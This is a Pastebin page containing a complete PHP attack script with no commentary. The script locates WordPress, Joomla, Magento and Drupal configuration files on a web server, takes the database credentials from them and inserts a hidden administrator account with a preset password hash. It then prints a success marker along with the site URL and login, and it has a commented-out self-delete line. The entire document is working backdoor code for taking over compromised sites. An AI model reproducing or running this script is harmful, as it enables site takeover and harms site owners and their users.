Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $wphash = "\$P\$BX5hR10IRwKGBDqv5xMXJ8HAdgoqKf1";
- $jmhash = "\$2y\$10\$66zdCOS4wcc3W4yCyUUzCeBr3qlzXOgtRhUtAIDcw/o2.7D0XUjMG";
- $mghash = "48706d67e7573a18bdd20d11f37e606a:SbZKZILZINoithvhQ3TJt35JCiqiayyK";
- $mg2hash = "a1d99eaeaba58040bbf0cd4776cc549c7c029eba250fcd4a7f8928e6f475d7bb:XiT8a32Xmf4LEPc2hJmbK1FM7rKGwLiw:1";
- $dphash="\$S\$D3ipHxI7ftt3us.0Acq.kUo/me0jvyWSlTv.FRLbd3gaplWWq4W3";
- $u_name = "Alex";
- /****find config files****/
- $rootpath = "";
- if(isset($_SERVER["DOCUMENT_ROOT"]))
- {
- $rootpath = $_SERVER["DOCUMENT_ROOT"];
- } else
- {
- $rootpath = preg_replace('/(htdocs|httpdocs|www)(.*)/','$1',dirname($_SERVER["SCRIPT_FILENAME"]));
- }
- $pathArr =array();
- $startPath="";
- $depth=0;
- $sep = "/";
- if (strstr($rootpath,"/"))
- {
- $pathArr = explode("/",$rootpath);
- } elseif (strstr($rootpath,"\\"))
- {
- $pathArr = explode("\\",$rootpath);
- $sep = "\\";
- }
- $depth = count($pathArr);
- if($depth>=2)
- {
- $startPath = $pathArr[0];
- for($i=1;$i<count($pathArr)-1;$i++)
- {
- $startPath = $startPath.$sep.$pathArr[$i];
- $configs=findconfig($startPath,$depth);
- if(count($configs))
- {
- break;
- }
- $depth--;
- }
- } else
- {
- $startPath = $rootpath;
- $configs=findconfig($startPath,$depth);
- }
- if(count($configs)<=0)
- {
- $configs=findconfig($rootpath,2);
- }
- $addOk = false;
- if(is_array($configs))
- {
- $configs = array_unique($configs);
- foreach($configs as $config)
- {
- try{
- $addedUsrs = NULL;
- $cont = file_get_contents($config);
- $cmstype = "";
- if (stripos($config,"wp-config.php"))
- {
- $addedUsrs=setWPUser($cont,$u_name,$wphash);
- $cmstype = "WORDPRESS";
- } elseif(stripos($config,"configuration.php"))
- {
- $addedUsrs=setJMUser($cont,$u_name,$jmhash);
- $cmstype = "JOOMLA";
- } elseif(stripos($config,"local.xml"))
- {
- $addedUsrs=setMGUser($cont,$u_name,$mghash,false);
- $cmstype = "MAGENTO";
- } elseif(stripos($config,"env.php"))
- {
- $addedUsrs=setMGUser($cont,$u_name,$mg2hash,true);
- $cmstype = "MAGENTO";
- } elseif(stripos($config,"settings.php"))
- {
- $addedUsrs=setDPUser($cont,$u_name,$dphash,true);
- $cmstype = "DRUPAL";
- }
- if(is_array($addedUsrs))
- {
- try
- {
- $url = $addedUsrs["url"];
- if(empty($url))
- {$url=$config;}
- if(!$addOk)
- {
- $addOk = true;
- echo "explOK12345" ;
- echo "<br>";
- }
- echo $cmstype.":".$url.":".$addedUsrs["user"].":".$addedUsrs["pass"];
- }catch(Exception $e)
- { echo $e->getMessage();}
- echo "<br>";
- }
- }catch(Exception $e)
- {;}
- }
- }
- //unlink($_SERVER["SCRIPT_FILENAME"]);
- //����� ��������
- function findconfig($source,$depth)
- {
- $source = str_replace('\\', '/', realpath($source));
- $result=array();
- try
- {
- if (is_dir($source) === true)
- {
- $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source,RecursiveDirectoryIterator::KEY_AS_PATHNAME), RecursiveIteratorIterator::SELF_FIRST,RecursiveIteratorIterator::CATCH_GET_CHILD);
- $files->setMaxDepth($depth);
- foreach ($files as $file => $fileInfo)
- {
- try{
- $file = str_replace('\\', '/', $file);
- $file2 = $file;
- if( in_array(substr($file, strrpos($file, '/')+1), array('.', '..')) )
- continue;
- $file = realpath($file);
- if ((is_file($file) === true)&&(basename($file)=="configuration.php"||basename($file)=="wp-config.php"))
- {
- $result[]=$file;
- } elseif(is_dir($file)&&strstr($file2,"app/etc"))
- {
- //
- //local.xml
- if(file_exists(realpath($file."/env.php")))
- {
- $result[]= realpath($file."/env.php");
- }
- elseif(file_exists(realpath($file."/local.xml")))
- {
- $result[]= realpath($file."/local.xml");
- }
- }elseif(is_dir($file)&&strstr($file2,"sites/default"))
- {
- //
- //local.xml
- if(file_exists(realpath($file."/settings.php")))
- {
- $result[]= realpath($file."/settings.php");
- }
- }
- }catch(Exception $iterex)
- {
- ;
- }
- }
- }
- elseif ((is_file($source) === true)&&(basename($file)=="configuration.php"||basename($file)=="wp-config.php"))
- {
- $result[]=$file;
- } elseif(is_dir($file)&&stristr($file,"app/etc"))
- {
- if(file_exists(realpath($file."/env.php")))
- {
- $result[]= realpath($file."/env.php");
- }
- elseif(file_exists(realpath($file."/local.xml")))
- {
- $result[]= realpath($file."/local.xml");
- }
- }elseif(is_dir($file)&&strstr($file2,"sites/default"))
- {
- //
- //local.xml
- if(file_exists(realpath($file."/settings.php")))
- {
- $result[]= realpath($file."/settings.php");
- }
- }
- } catch (Exception $e) {
- ;
- }
- return $result;
- }
- function generate_password($number)
- {
- $arr = array('a','b','c','d','e','f',
- 'g','h','i','j','k','l',
- 'm','n','o','p','r','s',
- 't','u','v','x','y','z',
- 'A','B','C','D','E','F',
- 'G','H','I','J','K','L',
- 'M','N','O','P','R','S',
- 'T','U','V','X','Y','Z',
- '1','2','3','4','5','6',
- '7','8','9','0' );
- $pass = "";
- for($i = 0; $i < $number; $i++)
- {
- $index = rand(0, count($arr) - 1);
- $pass .= $arr[$index];
- }
- return $pass;
- }
- function setWPUser($cont,$u_name,$pass)
- {
- $db_name = NULL;
- $db_user = NULL;
- $db_pass = NULL;
- $db_host= NULL;
- $tbl_preffix="";
- $db_preffix="";
- $uri="";
- preg_match_all('/(define\(\')([^\']+)(\',\s*\')([^\']+)/', $cont, $matches);
- if(is_array($matches))
- {
- for($i=0;$i<count($matches[2]);$i++)
- {
- if(stristr($matches[2][$i],"DB_NAME"))
- {$db_name=$matches[4][$i];}
- elseif(stristr($matches[2][$i],"db_user"))
- {$db_user=$matches[4][$i];}
- elseif(stristr($matches[2][$i],"db_password"))
- {$db_pass=$matches[4][$i];}
- elseif(stristr($matches[2][$i],"db_host"))
- {$db_host=$matches[4][$i];}
- }
- if(!empty($db_name))
- {
- preg_match('/(\$table_prefix\s*=\s*\')([^\']+)/', $cont, $mpreffix);
- if(is_array($mpreffix)&&count($mpreffix)==3)
- {$tbl_preffix=$mpreffix[2];}
- if(function_exists('mysql_connect')){
- if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
- if(mysql_select_db($db_name,$con_mss))
- {
- $result = mysql_query ("SELECT option_value FROM ".$tbl_preffix."options where option_name='siteurl' ", $con_mss);
- if($result)
- {
- $row = mysql_fetch_row($result);
- if(is_array($row)&&count($row)>0)
- $uri=trim($row[0]);
- }
- $result = mysql_query ("SELECT ID FROM ".$tbl_preffix."users where user_login='$u_name' ", $con_mss);
- if($result)
- {
- $row = mysql_fetch_row($result);
- if($row)
- {$u_name = generate_password(6);}
- }
- $ErrorMsg = "";
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."users (user_login,user_pass,user_nicename,user_email,display_name) VALUES('$u_name','$pass','$u_name','$u_name','$u_name') ", $con_mss) or $ErrorMsg = mysql_error();
- $repcnt=0;
- while(stristr($ErrorMsg,"duplicate")&&$repcnt<3&&!$insusrquery)
- {
- $ErrorMsg = "";
- $u_name = generate_password(6);
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."users (user_login,user_pass,user_nicename,user_email,display_name) VALUES('$u_name','$pass','$u_name','$u_name','$u_name') ", $con_mss) or $ErrorMsg = mysql_error();
- $repcnt++;
- }
- if($insusrquery)
- {
- $result = mysql_query ("SELECT ID FROM ".$tbl_preffix."users where user_login='$u_name' AND user_pass='$pass' ", $con_mss);
- if($result)
- {
- $row = mysql_fetch_row($result);
- if(is_array($row)&&count($row)>0)
- $usrdID=$row[0];
- if($usrdID>0)
- {
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."usermeta (user_id,meta_key,meta_value) VALUES($usrdID,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}') ", $con_mss) or $ErrorMsg = mysql_error();
- if($insusrquery)
- {
- return Array("url"=>$uri,"user"=>$u_name,"pass"=>$pass) ;
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- function setJMUser($cont,$u_name,$pass)
- {
- $db_name = NULL;
- $db_user = NULL;
- $db_pass = NULL;
- $db_host= NULL;
- $tbl_preffix="";
- $uri="";
- preg_match_all('/(\$\w+\s*=\s*\')([^\']+)(\'\s*\;)/', $cont, $matches);
- if(is_array($matches))
- {
- for($i=0;$i<count($matches[1]);$i++)
- {
- if(stristr($matches[1][$i],"\$db "))
- {$db_name=$matches[2][$i];}
- elseif(stristr($matches[1][$i],"\$user "))
- {$db_user=$matches[2][$i];}
- elseif(stristr($matches[1][$i],"\$password"))
- {$db_pass=$matches[2][$i];}
- elseif(stristr($matches[1][$i],"\$host"))
- {$db_host=$matches[2][$i];}
- elseif(stristr($matches[1][$i],"\$dbprefix"))
- {$tbl_preffix=$matches[2][$i];}
- elseif(stristr($matches[1][$i],"\$sitename"))
- {$uri=$matches[2][$i];}
- }
- if(!empty($db_name))
- {
- if(function_exists('mysql_connect')){
- if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
- if(mysql_select_db($db_name,$con_mss))
- {
- $result = mysql_query ("SELECT id FROM ".$tbl_preffix."users where username='$u_name' ", $con_mss);
- if($result)
- {
- $row = mysql_fetch_row($result);
- if($row)
- {$u_name = generate_password(6);}
- }
- $ErrorMsg = "";
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."users (name,username,password,sendEmail,params) VALUES('$u_name','$u_name','$pass',0,'{}') ", $con_mss) or $ErrorMsg = mysql_error();
- $repcnt=0;
- while(stristr($ErrorMsg,"duplicate")&&$repcnt<3&&!$insusrquery)
- {
- $ErrorMsg = "";
- $u_name = generate_password(6);
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."users (name,username,password,sendEmail,params) VALUES('$u_name','$u_name','$pass',0,'{}') ", $con_mss) or $ErrorMsg = mysql_error();
- $repcnt++;
- }
- if($insusrquery)
- {
- $result = mysql_query ("SELECT id FROM ".$tbl_preffix."users where username='$u_name' AND password='$pass' ", $con_mss);
- if($result)
- {
- $row = mysql_fetch_row($result);
- if(is_array($row)&&count($row)>0)
- $usrdID=$row[0];
- if($usrdID>0)
- {
- $adminID=7;
- $result = mysql_query ("SELECT id FROM ".$tbl_preffix."usergroups where title LIKE '%administrator%' ", $con_mss);
- if($result)
- {
- $row = mysql_fetch_row($result);
- if(is_array($row)&&count($row)>0)
- $adminID=trim($row[0]);
- }
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."user_usergroup_map (user_id,group_id) VALUES($usrdID,$adminID) ", $con_mss) or $ErrorMsg = mysql_error();
- if($insusrquery)
- {
- return Array("url"=>trim($uri),"user"=>$u_name,"pass"=>$pass) ;
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- function setMGUser($cont,$u_name,$pass,$ismg2)
- {
- $db_name = NULL;
- $db_user = NULL;
- $db_pass = NULL;
- $db_host= NULL;
- $tbl_preffix="";
- $uri="";
- $roletbl="";
- if(!$ismg2&&stristr($cont,"<?xml version"))
- {
- $dbdata = new SimpleXMLElement($cont);
- $db_name = $dbdata->global->resources->default_setup->connection->dbname;
- $db_user = $dbdata->global->resources->default_setup->connection->username;
- $db_pass = $dbdata->global->resources->default_setup->connection->password;
- $db_host= $dbdata->global->resources->default_setup->connection->host;
- $tbl_preffix=$dbdata->global->resources->db->table_prefix;
- } elseif($ismg2&&stristr($cont,"'host' =>"))
- {
- //'host' => 'localhost',
- preg_match_all('/(\')(\w+)(\'\s*\=\>\s*\')([^\']+)/', $cont, $matches);
- if(is_array($matches))
- {
- for($i=0;$i<count($matches[2]);$i++)
- {
- if(stristr($matches[2][$i],"dbname"))
- {$db_name=$matches[4][$i];}
- elseif(stristr($matches[2][$i],"username"))
- {$db_user=$matches[4][$i];}
- elseif(stristr($matches[2][$i],"password"))
- {$db_pass=$matches[4][$i];}
- elseif(stristr($matches[2][$i],"host"))
- {$db_host=$matches[4][$i];}
- elseif(stristr($matches[2][$i],"table_prefix"))
- {$tbl_preffix=$matches[4][$i];}
- }
- }
- }
- if(!is_null($db_name)&&!empty($db_name))
- {
- if(function_exists('mysql_connect')){
- if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
- if(mysql_select_db($db_name,$con_mss))
- {
- $result = mysql_query ("SELECT value FROM ".$tbl_preffix."core_config_data where path='web/unsecure/base_url' ", $con_mss);
- if($result)
- {
- $row = mysql_fetch_row($result);
- if(is_array($row)&&count($row)>0)
- $uri=trim($row[0]);
- }
- $result = mysql_query ("SELECT user_id FROM ".$tbl_preffix."admin_user where username='$u_name' ", $con_mss);
- if($result)
- {
- $row = mysql_fetch_row($result);
- if($row)
- {$u_name = generate_password(6);}
- }
- $ErrorMsg = "";
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."admin_user (firstname,lastname,email,username,password,reload_acl_flag,is_active,extra) VALUES ('$u_name','$u_name','email@example.com','$u_name','$pass',0,1,'N;') ", $con_mss) or $ErrorMsg = mysql_error();
- $repcnt=0;
- while(stristr($ErrorMsg,"duplicate")&&$repcnt<3&&!$insusrquery)
- {
- $ErrorMsg = "";
- $u_name = generate_password(6);
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."admin_user (firstname,lastname,email,username,password,reload_acl_flag,is_active,extra) VALUES ('$u_name','$u_name','email@example.com','$u_name','$pass',0,1,'N;') ", $con_mss) or $ErrorMsg = mysql_error();
- $repcnt++;
- }
- if($insusrquery)
- {
- if(!$ismg2){
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."admin_role (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM ".$tbl_preffix."admin_user WHERE username = '$u_name'),'$u_name')",$con_mss) or $ErrorMsg = mysql_error();
- } else
- {
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."authorization_role (parent_id,tree_level,sort_order,role_type,user_id,user_type,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM ".$tbl_preffix."admin_user WHERE username = '$u_name'),2,'$u_name')",$con_mss) or $ErrorMsg = mysql_error();
- }
- //$roletbl="";
- //$roletbl="";
- if($insusrquery)
- {
- return Array("url"=>trim($uri),"user"=>$u_name,"pass"=>$pass) ;
- }
- }
- }
- }
- }
- }
- }
- function setDPUser($cont,$u_name,$pass)
- {
- $db_name = NULL;
- $db_user = NULL;
- $db_pass = NULL;
- $db_host= NULL;
- $tbl_preffix="";
- $uri="";
- $roletbl="";
- if(stristr($cont,"'host' =>"))
- {
- //'host' => 'localhost',
- preg_match_all('/^(\s+\')(\w+)(\'\s*\=\>\s*\')([^\']+)/m', $cont, $matches);
- if(is_array($matches))
- {
- for($i=0;$i<count($matches[2]);$i++)
- {
- if(stristr($matches[2][$i],"database"))
- {$db_name=$matches[4][$i];}
- elseif(stristr($matches[2][$i],"username"))
- {$db_user=$matches[4][$i];}
- elseif(stristr($matches[2][$i],"password"))
- {$db_pass=$matches[4][$i];}
- elseif(stristr($matches[2][$i],"host"))
- {$db_host=$matches[4][$i];}
- elseif(stristr($matches[2][$i],"prefix"))
- {$tbl_preffix=$matches[4][$i];}
- }
- }
- }
- if(!is_null($db_name)&&!empty($db_name))
- {
- if(function_exists('mysql_connect')){
- if (($con_mss = @mysql_connect($db_host,$db_user,$db_pass,true))) {
- if(mysql_select_db($db_name,$con_mss))
- {
- $result = mysql_query ("SELECT value FROM ".$tbl_preffix."variable where name='site_name' ", $con_mss);
- if($result)
- {
- $row = mysql_fetch_row($result);
- if(is_array($row)&&count($row)>0)
- $uri= unserialize(trim($row[0]));
- }
- $ErrorMsg = "";
- $isD8 = false;
- $result = mysql_query ("SELECT uid FROM ".$tbl_preffix."users where name='$u_name' ", $con_mss) or $ErrorMsg = mysql_error();
- if ($ErrorMsg)
- {
- $isD8 = true;
- $ErrorMsg = "";
- $result = mysql_query ("SELECT uid FROM ".$tbl_preffix."users_field_data where name='$u_name' ", $con_mss) or $ErrorMsg = mysql_error();
- }
- if($result)
- {
- $row = mysql_fetch_row($result);
- if($row)
- {$u_name = generate_password(6);}
- }
- }
- if($isD8)
- {
- $result = mysql_query ("SELECT MAX(uid) FROM ".$tbl_preffix."users_field_data", $con_mss);
- } else
- {
- $result = mysql_query ("SELECT MAX(uid) FROM ".$tbl_preffix."users", $con_mss);
- }
- $prevuid=256;
- if($result)
- {
- $row = mysql_fetch_row($result);
- if(is_array($row)&&count($row)>0)
- $prevuid= $row[0]+1;
- }
- if ($isD8)
- {
- $ErrorMsg = "";
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."users_field_data (uid,name,pass,status,init,langcode,created,access,default_langcode) VALUES ($prevuid,'$u_name','$pass',1,'$u_name','en',1522280463,1522280463,1) ", $con_mss) or $ErrorMsg = mysql_error();
- $repcnt=0;
- while(stristr($ErrorMsg,"duplicate")&&$repcnt<3&&!$insusrquery)
- {
- $ErrorMsg = "";
- $u_name = generate_password(6);
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."users_field_data (uid,name,pass,status,init,langcode,created,access,default_langcode) VALUES ($prevuid,'$u_name','$pass',1,'$u_name','en',1522280463,1522280463,1) ", $con_mss) or $ErrorMsg = mysql_error();
- $repcnt++;
- }
- if($insusrquery)
- {
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."user__roles (bundle,entity_id,revision_id,langcode,delta,roles_target_id) VALUES ('user',$prevuid,1,'en',0,'administrator') ", $con_mss) or $ErrorMsg = mysql_error();
- $uuidd = sprintf('%04X%04X-%04X-%04X-%04X-%04X%04X%04X', mt_rand(0, 65535), mt_rand(0, 65535), mt_rand(0, 65535), mt_rand(16384, 20479), mt_rand(32768, 49151), mt_rand(0, 65535), mt_rand(0, 65535), mt_rand(0, 65535));
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."users (uid,uuid,langcode) VALUES ($prevuid,'".$uuidd."','en') ", $con_mss) or $ErrorMsg = mysql_error();
- if($insusrquery)
- {
- return Array("url"=>trim($uri),"user"=>$u_name,"pass"=>$pass) ;
- }
- }
- }
- else
- {
- $ErrorMsg = "";
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."users (uid,name,pass,status,init,data) VALUES ($prevuid,'$u_name','$pass',1,'1','b:0;') ", $con_mss) or $ErrorMsg = mysql_error();
- $repcnt=0;
- while(stristr($ErrorMsg,"duplicate")&&$repcnt<3&&!$insusrquery)
- {
- $ErrorMsg = "";
- $u_name = generate_password(6);
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."users (name,pass,init,data) VALUES ('$u_name','$pass','1','b:0;') ", $con_mss) or $ErrorMsg = mysql_error();
- $repcnt++;
- }
- if($insusrquery)
- {
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."role (name,weight) VALUES ('$u_name',2) ", $con_mss) or $ErrorMsg = mysql_error();
- if($insusrquery)
- {
- $result = mysql_query ("SELECT rid FROM ".$tbl_preffix."role where name='$u_name' ", $con_mss);
- if($result)
- {
- $row = mysql_fetch_row($result);
- if(is_array($row)&&count($row)>0)
- $rid= $row[0];
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."role_permission (rid,permission,module) VALUES ($rid,'access administration pages','system'),($rid,'access site in maintenance mode','system'),($rid,'access user profiles','user'),($rid,'administer actions','system'),($rid,'administer blocks','block'),($rid,'administer modules','system'),($rid,'administer permissions','user'),($rid,'administer site configuration','system'),($rid,'administer themes','system'),($rid,'administer users','user')", $con_mss) or $ErrorMsg = mysql_error();
- if($insusrquery)
- {
- $insusrquery = mysql_query ("INSERT INTO ".$tbl_preffix."users_roles (uid,rid) VALUES ((SELECT uid FROM ".$tbl_preffix."users WHERE name = '$u_name'),$rid) ", $con_mss) or $ErrorMsg = mysql_error();
- if($insusrquery)
- {
- return Array("url"=>trim($uri),"user"=>$u_name,"pass"=>$pass) ;
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement